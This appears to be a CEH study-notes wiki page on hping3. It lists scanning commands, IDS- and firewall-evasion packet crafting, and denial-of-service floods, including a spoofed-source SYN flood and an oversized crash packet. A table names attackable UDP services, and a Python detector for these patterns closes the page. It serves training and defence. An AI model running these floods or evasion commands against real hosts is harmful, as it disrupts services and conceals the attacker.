CEH_hping3 - yenbohuang/techNotes GitHub Wiki
hping3: https://www.kali.org/tools/hping3/
Scanning Networks

| Command | Note |
| --- | --- |
| `hping3 -A 10.10.1.22 -p 80 -c 5` | ACK scan (check open port) |
| `hping3 -8 0-100 -S 10.10.1.22 -V` | SYN scan (find port + service) |
| `hping3 -F -P -U 10.10.1.22 -p 80 -c 5` | FIN, PUSH, and URG scan (check open port) |
| `hping3 --scan 0-100 -S 10.10.1.22` | TCP stealth scan (find port + service) |
| `hping3 -1 10.10.1.22 -p 80 -c 5` | ICMP ping scan (check open port) |
| `hping3 -1 10.10.1.0/24 --rand-dest -I eth0` | Entire subnet scan for live host |
| `hping3 -2 10.10.1.22 -p 80 -c 5` | UDP scan |

Create Custom UDP and TCP Packets to Evade the IDS/Firewall

| Command | Note |
| --- | --- |
| `hping3 10.10.1.11 --udp --rand-source --data 500` | Send UDP packets with random source mode and fixed packet body size. |
| `hping3 -S 10.10.1.11 -p 80 -c 5` | Send TCP SYN request. |
| `hping3 10.10.1.11 --flood` | Performs TCP flooding. |

Denial-of-Service
Perform a DoS Attack on a Target Host using hping3

| Command | Note |
| --- | --- |
| `hping3 -S <Target IP Address> -a <Spoofable IP Address> -p 22 --flood` | Floods the victim machine by sending bulk SYN packets and overloading the victim’s resources. |
| `hping3 -d 65538 -S -p 21 --flood <Target IP Address>` | The attacker sends a packet that has a size of 65,538 bytes to the target web server. This packet size exceeds the size limit prescribed by RFC 791 (IP), which is 65,535 bytes. The receiving system’s reassembly process might cause the system to crash. |
| `hping3 -2 -p 139 --flood <Target IP Address>` | Uses NetBIOS port 139 to perform a UDP application layer flood attack. |

UDP ports that can be attacked:

| Service | Port Number |
| --- | --- |
| CharGEN | 19 |
| SNMPv2 | 161 |
| QOTD | 17 |
| RPC | 135 |
| SSDP | 1900 |
| CLDAP | 389 |
| TFTP | 69 |
| NetBIOS | 137,138,139 |
| NTP | 123 |
| Quake Network Protocol | 26000 |
| VoIP | 5060 |
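
On the defensive side, the three DoS patterns above (bulk SYNs, a datagram over 65,535 bytes, a UDP flood toward one of the listed ports) can be flagged from packet summaries. The following is an added example, not part of the original notes; the record fields, thresholds, source address and sample traffic are constructed assumptions.

```python
from collections import Counter

# UDP ports from the service table above.
UDP_WATCH = {19: "CharGEN", 161: "SNMPv2", 17: "QOTD", 135: "RPC", 1900: "SSDP",
             389: "CLDAP", 69: "TFTP", 137: "NetBIOS", 138: "NetBIOS",
             139: "NetBIOS", 123: "NTP", 26000: "Quake", 5060: "VoIP"}
MAX_IP_DATAGRAM = 65535  # RFC 791 limit cited above


def detect(packets, window=1.0, limit=100, min_ack_ratio=0.1):
    """Return sorted (alert, dst, dport) tuples. Thresholds are assumptions."""
    syn, ack, udp = Counter(), Counter(), Counter()
    alerts = set()
    for p in packets:
        key = (int(p["ts"] // window), p["dst"], p["dport"])
        if p["length"] > MAX_IP_DATAGRAM:  # reassembled size over the limit
            alerts.add(("oversized-datagram", p["dst"], p["dport"]))
        if p["proto"] == "tcp" and p["flags"] == "S":
            syn[key] += 1
        elif p["proto"] == "tcp" and p["flags"] == "A":
            ack[key] += 1
        elif p["proto"] == "udp" and p["dport"] in UDP_WATCH:
            udp[key] += 1
    for key, n in syn.items():
        # Many SYNs with few completing ACKs: half-open connections pile up.
        if n > limit and ack[key] < n * min_ack_ratio:
            alerts.add(("syn-flood", key[1], key[2]))
    for key, n in udp.items():
        if n > limit:
            alerts.add(("udp-flood:" + UDP_WATCH[key[2]], key[1], key[2]))
    return sorted(alerts)


def sample_packets():
    """Constructed records, all inside one second, aimed at 10.10.1.11."""
    def pkt(i, proto, dport, flags="", length=60, src="10.10.1.13"):
        return {"ts": i / 1000.0, "src": src, "dst": "10.10.1.11",
                "proto": proto, "dport": dport, "flags": flags, "length": length}
    pkts = [pkt(i, "tcp", 22, "S") for i in range(300)]       # SYNs, no ACKs
    for i in range(150):                                       # busy but healthy web port
        pkts += [pkt(i, "tcp", 80, "S"), pkt(i, "tcp", 80, "A")]
    pkts += [pkt(i, "udp", 139, length=1400) for i in range(200)]
    pkts += [pkt(i, "udp", 53) for i in range(20)]             # not on the watch list
    pkts.append(pkt(0, "tcp", 21, "S", length=65578))          # over 65,535 bytes
    return pkts


if __name__ == "__main__":
    print(detect(sample_packets()))
```

The ACK-ratio check keeps a busy but healthy port (port 80 in the sample) from being reported as a SYN flood; tune `limit` and `min_ack_ratio` against a baseline of normal traffic.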